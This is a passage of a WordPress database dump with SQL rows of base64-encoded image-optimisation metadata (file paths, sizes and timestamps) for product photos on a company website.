vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1N5cmluZ2UtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9TeXJpbmdlLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxMTcsInRpbWUiOjE0ODM1ODY2MzMsImlkIjozOTF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TeXJpbmdlLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvU3lyaW5nZS0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1N5cmluZ2UtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY2MzUsImlkIjozOTF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TeXJpbmdlLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvU3lyaW5nZS0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1N5cmluZ2UtMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY2MzcsImlkIjozOTF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TeXJpbmdlLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvU3lyaW5nZS0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1N5cmluZ2UtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY2MzksImlkIjozOTF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TeXJpbmdlLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvU3lyaW5nZS00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1N5cmluZ2UtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY2NDIsImlkIjozOTF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TeXJpbmdlLTYwMHg2MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvU3lyaW5nZS02MDB4NjAwLmpwZyIsIndpZHRoIjoiNjAwIiwiaGVpZ2h0IjoiNjAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1N5cmluZ2UtNjAweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY2NDQsImlkIjozOTF9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30197, 390, 'wpfc_optimisation_reduction', '44952'); 
INSERT INTO `wp_postmeta` VALUES (30198, 390, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTmVlZGxlLU5vc2UuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9OZWVkbGUtTm9zZS5qcGciLCJ3aWR0aCI6Mjk4OCwiaGVpZ2h0Ijo0Mjg3LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvTmVlZGxlLU5vc2UuanBnIiwicmVkdWN0aW9uIjo0NDYzMCwidGltZSI6MTQ4MzU4NjY1NSwiaWQiOiIzOTAifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL05lZWRsZS1Ob3NlLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTmVlZGxlLU5vc2UtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9OZWVkbGUtTm9zZS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NjY1OCwiaWQiOjM5MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9OZWVkbGUtTm9zZS01NTh4ODAwLmpwZyIsIndpZHRoIjo1NTgsImhlaWdodCI6ODAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL05lZWRsZS1Ob3NlLTU1OHg4MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvTmVlZGxlLU5vc2UtNTU4eDgwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY2NjEsImlkIjozOTB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTmVlZGxlLU5vc2UtNzY4eDExMDIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0IjoxMTAyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL05lZWRsZS1Ob3NlLTc2OHgxMTAyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL05lZWRsZS1Ob3NlLTc2OHgxMTAyLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NjY2NCwiaWQiOjM5MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9OZWVkbGUtTm9zZS0xMTE1eDE2MDAuanBnIiwid2lkdGgiOjExMTUsImhlaWdodCI6MTYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9OZWVkbGUtTm9zZS0xMTE1eDE2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvTmVlZGxlLU5vc2UtMTExNXgxNjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NjY2OCwiaWQiOjM5MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9OZWVkbGUtTm9zZS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL05lZWRsZS1Ob3NlLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvTmVlZGxlLU5vc2UtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY2NzAsImlkIjozOTB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTmVlZGxlLU5vc2UtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9OZWVkbGUtTm9zZS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL05lZWRsZS1Ob3NlLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg2NjczLCJpZCI6MzkwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL05lZWRsZS1Ob3NlLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTmVlZGxlLU5vc2UtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9OZWVkbGUtTm9zZS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NjY3NSwiaWQiOjM5MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9OZWVkbGUtTm9zZS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL05lZWRsZS1Ob3NlLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvTmVlZGxlLU5vc2UtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY2NzgsImlkIjozOTB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9OZWVkbGUtTm9zZS0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL05lZWRsZS1Ob3NlLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvTmVlZGxlLU5vc2UtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjIxMiwidGltZSI6MTQ4MzU4NjY4MSwiaWQiOjM5MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL05lZWRsZS1Ob3NlLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTmVlZGxlLU5vc2UtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9OZWVkbGUtTm9zZS0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6OTgsInRpbWUiOjE0ODM1ODY2ODMsImlkIjozOTB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9OZWVkbGUtTm9zZS0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL05lZWRsZS1Ob3NlLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvTmVlZGxlLU5vc2UtMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY2ODYsImlkIjozOTB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9OZWVkbGUtTm9zZS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL05lZWRsZS1Ob3NlLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvTmVlZGxlLU5vc2UtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY2ODgsImlkIjozOTB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9OZWVkbGUtTm9zZS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL05lZWRsZS1Ob3NlLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvTmVlZGxlLU5vc2UtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY2OTEsImlkIjozOTB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9OZWVkbGUtTm9zZS02MDB4NjAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL05lZWRsZS1Ob3NlLTYwMHg2MDAuanBnIiwid2lkdGgiOiI2MDAiLCJoZWlnaHQiOiI2MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvTmVlZGxlLU5vc2UtNjAweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY2OTMsImlkIjozOTB9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30199, 389, 'wpfc_optimisation_reduction', '20529'); 
INSERT INTO `wp_postmeta` VALUES (30200, 389, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRGFiLU8tTWF0aWMuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9EYWItTy1NYXRpYy5qcGciLCJ3aWR0aCI6Mjk4OCwiaGVpZ2h0IjozNjc2LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRGFiLU8tTWF0aWMuanBnIiwicmVkdWN0aW9uIjoyMDQ0OCwidGltZSI6MTQ4MzU4NjcwNSwiaWQiOiIzODkifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0RhYi1PLU1hdGljLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRGFiLU8tTWF0aWMtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9EYWItTy1NYXRpYy0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NjcwOCwiaWQiOjM4OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9EYWItTy1NYXRpYy02NTB4ODAwLmpwZyIsIndpZHRoIjo2NTAsImhlaWdodCI6ODAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0RhYi1PLU1hdGljLTY1MHg4MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRGFiLU8tTWF0aWMtNjUweDgwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY3MTEsImlkIjozODl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRGFiLU8tTWF0aWMtNzY4eDk0NS5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjk0NSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9EYWItTy1NYXRpYy03Njh4OTQ1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0RhYi1PLU1hdGljLTc2OHg5NDUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg2NzE0LCJpZCI6Mzg5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0RhYi1PLU1hdGljLTEzMDF4MTYwMC5qcGciLCJ3aWR0aCI6MTMwMSwiaGVpZ2h0IjoxNjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0RhYi1PLU1hdGljLTEzMDF4MTYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9EYWItTy1NYXRpYy0xMzAxeDE2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg2NzE4LCJpZCI6Mzg5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0RhYi1PLU1hdGljLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRGFiLU8tTWF0aWMtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9EYWItTy1NYXRpYy0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NjcyMSwiaWQiOjM4OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9EYWItTy1NYXRpYy0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0RhYi1PLU1hdGljLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRGFiLU8tTWF0aWMtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY3MjMsImlkIjozODl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRGFiLU8tTWF0aWMtMjI1eDIyNS5qcGciLCJ3aWR0aCI6M